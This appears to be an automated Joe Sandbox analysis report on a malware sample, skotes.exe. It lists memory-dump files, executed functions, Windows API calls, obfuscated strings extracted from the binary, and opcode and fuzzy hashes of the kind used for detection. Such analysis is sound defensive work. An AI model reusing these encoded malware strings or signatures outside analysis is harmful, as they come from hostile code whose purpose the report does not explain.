Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: be09204eac04e7313df27fd42ef57626f924714acfedefed4ff4203c1c515d22
Instruction ID: b5a971d734513cc652f157abeb7aaa23e16328067f382f18b52b7b790e152cd9
Opcode Fuzzy Hash: be09204eac04e7313df27fd42ef57626f924714acfedefed4ff4203c1c515d22
Instruction Fuzzy Hash: 38214C72E01119EFDF41EFA4DC859BEB7B9EF08710F114429FA01A7261DB389D059BA1

Function 0076F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0076F3A3

Strings

8"y, xrefs: 0076F44B
`'y, xrefs: 0076F375

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"y$`'y
API String ID: 3903695350-752720508
Opcode ID: 18c09668ce37790c6fcbd91a945a8e520947aa5f6c0f14483174c95bff54f6a9
Instruction ID: 08d18efe8b00d60ef6f41bd0982ffb53ee2aab345495df3e67fafffd9f10787b
Opcode Fuzzy Hash: 18c09668ce37790c6fcbd91a945a8e520947aa5f6c0f14483174c95bff54f6a9
Instruction Fuzzy Hash: C3316131600602EFDB21AB39E849B5B77E4EF00351F14842AE857E7A99DF78EC80CB11

Analysis Process: skotes.exePID: 2704, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	1188
Total number of Limit Nodes:	107

Executed Functions

Function 0073E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 974
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WTs=, xrefs: 007405CA
WTw=, xrefs: 0074097D
L1y, xrefs: 0073F7E5
#, xrefs: 00740624
WDw=, xrefs: 0073F71D, 0073F9FA
9c9aa5, xrefs: 0073FB8E
MGE+, xrefs: 0073E821
111, xrefs: 0073F7A0
GnNoc2Hc, xrefs: 0073E56C
246122658369, xrefs: 0073F737, 0073FA14, 007405E7, 0074099A
MQ==, xrefs: 0073E592
UA==, xrefs: 0073EB0F, 0073ED56

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1y$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-403769546
Opcode ID: e797811fffcb752df0382d9eeab960f38d5004f44bc3330b6a7551f5f7fc7e23
Instruction ID: 60490e3990c4c41bc0171073f1556f91c1f0cd7ed709ac6afa88743a0bb21e90
Opcode Fuzzy Hash: e797811fffcb752df0382d9eeab960f38d5004f44bc3330b6a7551f5f7fc7e23
Instruction Fuzzy Hash: E682C170A04288DBEF19EF68C9497DEBFB5AB41304F508598E805673C3D7795A88CBD2

Function 00772517 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00786758), ref: 0077275C

Strings

Eastern Summer Time, xrefs: 007727FA
Xgx, xrefs: 00772705, 0077270B
Eastern Standard Time, xrefs: 007727CB

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time$Xgx
API String ID: 565725191-2331726656
Opcode ID: f8fb5289b2a6b17519609262632d4519af075667e9622a6b952bdeea0a86f949
Instruction ID: e45579119ad6b3a1747c75919586ba52aeee457a2f4c8cb579977f694efe6998
Opcode Fuzzy Hash: f8fb5289b2a6b17519609262632d4519af075667e9622a6b952bdeea0a86f949
Instruction Fuzzy Hash: FEC14871A00205EFDF149F288C45AAA7BB9EF05390F24C59AE9A9D7253E73D8E03C750

Function 0073EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073EB51
CreateDirectoryA.KERNEL32(00000000), ref: 0073EC83
GetFileAttributesA.KERNEL32(00000000), ref: 0073ED98

Strings

FCQgKF==, xrefs: 0073FEE4
L1y, xrefs: 0073F7E5
UA==, xrefs: 0073EC41, 0073ED56, 0073EF89, 0073F2CE
WTs=, xrefs: 007405CA
mxo1L0x, xrefs: 0073EE84
#, xrefs: 00740624
WDw=, xrefs: 0073F71D, 0073F9FA, 0073FDE3
stoi argument out of range, xrefs: 007408C4
9c9aa5, xrefs: 0073FB8E
111, xrefs: 0073F7A0
GiQaT29tduF=, xrefs: 0073FEB6
246122658369, xrefs: 0073F737, 0073FA14, 0073FE00, 007405E7
invalid stoi argument, xrefs: 007408B0
FisgLnsCZO1i, xrefs: 0073FF19

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFile$CreateDirectory
String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1y$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
API String ID: 1875963930-1933201902
Opcode ID: 24ee126c3261e4f9c6d2f45a62e0c17d754269caa533f4c796639133d99f7450
Instruction ID: 293055f0d86055a05aa8341f548213ce3960b3ba94cb31c0b71e9e5c298342e3
Opcode Fuzzy Hash: 24ee126c3261e4f9c6d2f45a62e0c17d754269caa533f4c796639133d99f7450
